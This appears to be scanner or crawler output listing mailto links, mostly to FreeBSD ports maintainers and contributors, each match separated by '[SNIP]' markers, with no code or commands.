<A HREF="mailto:klammer@webonaut.com">klammer@webonaut.com</A>
...[SNIP]...
<A HREF="mailto:novel@FreeBSD.org">novel@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:novel@FreeBSD.org">novel@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:girgen@FreeBSD.org">girgen@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:udo.schweigert@siemens.com">udo.schweigert@siemens.com</A>
...[SNIP]...
<A HREF="mailto:udo.schweigert@siemens.com">udo.schweigert@siemens.com</A>
...[SNIP]...
<A HREF="mailto:udo.schweigert@siemens.com">udo.schweigert@siemens.com</A>
...[SNIP]...
<A HREF="mailto:udo.schweigert@siemens.com">udo.schweigert@siemens.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:scott+ports@sabami.seaslug.org">scott+ports@sabami.seaslug.org</A>
...[SNIP]...
<A HREF="mailto:fernan@iib.unsam.edu.ar">fernan@iib.unsam.edu.ar</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nohtml@tundraware.com">nohtml@tundraware.com</A>
...[SNIP]...
<A HREF="mailto:lioux@FreeBSD.org">lioux@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:glarkin@FreeBSD.org">glarkin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pankov_p@mail.ru">pankov_p@mail.ru</A>
...[SNIP]...
<A HREF="mailto:sergei@FreeBSD.org">sergei@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:umq@ueo.co.jp">umq@ueo.co.jp</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ricardo.katz@gmail.com">ricardo.katz@gmail.com</A>
...[SNIP]...
<A HREF="mailto:kiwi@oav.net">kiwi@oav.net</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:avk@vl.ru">avk@vl.ru</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mopsfelder@gmail.com">mopsfelder@gmail.com</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kay.abendroth@raxion.net">kay.abendroth@raxion.net</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bill.brinzer@gmail.com">bill.brinzer@gmail.com</A>
...[SNIP]...
<A HREF="mailto:bill.brinzer@gmail.com">bill.brinzer@gmail.com</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ismail.yenigul@endersys.com.tr">ismail.yenigul@endersys.com.tr</A>
...[SNIP]...
<A HREF="mailto:mashtizadeh@gmail.com">mashtizadeh@gmail.com</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:Olivier.Girard@univ-angers.fr">Olivier.Girard@univ-angers.fr</A>
...[SNIP]...
<A HREF="mailto:Olivier.Girard@univ-angers.fr">Olivier.Girard@univ-angers.fr</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:freebsd-ports@t-b-o-h.net">freebsd-ports@t-b-o-h.net</A>
...[SNIP]...
<A HREF="mailto:freebsd-ports@t-b-o-h.net">freebsd-ports@t-b-o-h.net</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:bra@fsn.hu">bra@fsn.hu</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:yanagisawa@csg.is.titech.ac.jp">yanagisawa@csg.is.titech.ac.jp</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd@netfence.it">freebsd@netfence.it</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jadawin@FreeBSD.org">jadawin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:demon@FreeBSD.org">demon@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tjs@cdpa.nsysu.edu.tw">tjs@cdpa.nsysu.edu.tw</A>
...[SNIP]...
<A HREF="mailto:demon@FreeBSD.org">demon@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gmc@sonologic.nl">gmc@sonologic.nl</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:gslin@gslin.org">gslin@gslin.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:scheidell@secnap.net">scheidell@secnap.net</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:vivek@khera.org">vivek@khera.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:greenwood.andy@gmail.com">greenwood.andy@gmail.com</A>
...[SNIP]...
<A HREF="mailto:tjs@cdpa.nsysu.edu.tw">tjs@cdpa.nsysu.edu.tw</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johnpupu@gmail.com">johnpupu@gmail.com</A>
...[SNIP]...
<A HREF="mailto:james@now.ie">james@now.ie</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gslin@gslin.org">gslin@gslin.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fbsd@opal.com">fbsd@opal.com</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:marc@pilgerer.org">marc@pilgerer.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:snowfly@yuntech.edu.tw">snowfly@yuntech.edu.tw</A>
...[SNIP]...
<A HREF="mailto:skreuzer@FreeBSD.org">skreuzer@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:james@now.ie">james@now.ie</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joehorn@gmail.com">joehorn@gmail.com</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joehorn@gmail.com">joehorn@gmail.com</A>
...[SNIP]...
<A HREF="mailto:bra@fsn.hu">bra@fsn.hu</A>
...[SNIP]...
<A HREF="mailto:rafan@FreeBSD.org">rafan@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:buganini@gmail.com">buganini@gmail.com</A>
...[SNIP]...
<A HREF="mailto:thomas@bsdunix.ch">thomas@bsdunix.ch</A>
...[SNIP]...
<A HREF="mailto:A.J.Caines@halplant.com">A.J.Caines@halplant.com</A>
...[SNIP]...
<A HREF="mailto:flo@smeets.im">flo@smeets.im</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:nick@foobar.org">nick@foobar.org</A>
...[SNIP]...
<A HREF="mailto:joehorn@gmail.com">joehorn@gmail.com</A>
...[SNIP]...
<A HREF="mailto:joehorn@gmail.com">joehorn@gmail.com</A>
...[SNIP]...
<A HREF="mailto:dougb@FreeBSD.org">dougb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:jadawin@FreeBSD.org">jadawin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jonny@jonny.eng.br">jonny@jonny.eng.br</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mbr@FreeBSD.org">mbr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:leeym@FreeBSD.org">leeym@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ian@freislich.nom.za">ian@freislich.nom.za</A>
...[SNIP]...
<A HREF="mailto:matusita@FreeBSD.org">matusita@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tedm@ipinc.net">tedm@ipinc.net</A>
...[SNIP]...
<A HREF="mailto:andrew@ugh.net.au">andrew@ugh.net.au</A>
...[SNIP]...
<A HREF="mailto:kevlo@FreeBSD.org">kevlo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pav@FreeBSD.org">pav@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:A.J.Caines@halplant.com">A.J.Caines@halplant.com</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:delphij@FreeBSD.org">delphij@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kiwi@oav.net">kiwi@oav.net</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports.maintainer@evilphi.com">ports.maintainer@evilphi.com</A>
...[SNIP]...
<A HREF="mailto:robtone@ek-muc.de">robtone@ek-muc.de</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tabmow@freenode.net">tabmow@freenode.net</A>
...[SNIP]...
<A HREF="mailto:ports.maintainer@evilphi.com">ports.maintainer@evilphi.com</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:bapt@FreeBSD.org">bapt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:terry@sucked-in.com">terry@sucked-in.com</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:araujo@FreeBSD.org">araujo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:araujo@FreeBSD.org">araujo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:saturnero@gufi.org">saturnero@gufi.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:dimma@higis.ru">dimma@higis.ru</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:georg@graf.priv.at">georg@graf.priv.at</A>
...[SNIP]...
<A HREF="mailto:me@mortis.eu">me@mortis.eu</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dsh@wizard.volgograd.ru">dsh@wizard.volgograd.ru</A>
...[SNIP]...
<A HREF="mailto:chalpin@cs.wisc.edu">chalpin@cs.wisc.edu</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:utisoft@gmail.com">utisoft@gmail.com</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jmelo@FreeBSD.org">jmelo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:eksffa@freebsdbrasil.com.br">eksffa@freebsdbrasil.com.br</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lippe@FreeBSD.org">lippe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lippe@FreeBSD.org">lippe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:futurebsd@infoseek.to">futurebsd@infoseek.to</A>
...[SNIP]...
<A HREF="mailto:ismail.yenigul@endersys.com.tr">ismail.yenigul@endersys.com.tr</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mwill@spingen.com">mwill@spingen.com</A>
...[SNIP]...
<A HREF="mailto:mij@bitchx.it">mij@bitchx.it</A>
...[SNIP]...
<A HREF="mailto:ache@freebsd.org">ache@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:bc979@lafn.org">bc979@lafn.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jack@jarasoft.net">jack@jarasoft.net</A>
...[SNIP]...
<A HREF="mailto:ozkan@enderunix.org">ozkan@enderunix.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:yaizawa@2004.jukuin.keio.ac.jp">yaizawa@2004.jukuin.keio.ac.jp</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:moro@remus.dti.ne.jp">moro@remus.dti.ne.jp</A>
...[SNIP]...
<A HREF="mailto:drixter@e-utp.net">drixter@e-utp.net</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mike@tric.tomsk.gov.ru">mike@tric.tomsk.gov.ru</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oz@nixil.net">oz@nixil.net</A>
...[SNIP]...
<A HREF="mailto:kline@thought.org">kline@thought.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vsevolod@FreeBSD.org">vsevolod@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gromnizki@unixdev.net">gromnizki@unixdev.net</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsdports@chillibear.com">freebsdports@chillibear.com</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsdports@chillibear.com">freebsdports@chillibear.com</A>
...[SNIP]...
<A HREF="mailto:freebsdports@chillibear.com">freebsdports@chillibear.com</A>
...[SNIP]...
<A HREF="mailto:knu@FreeBSD.org">knu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
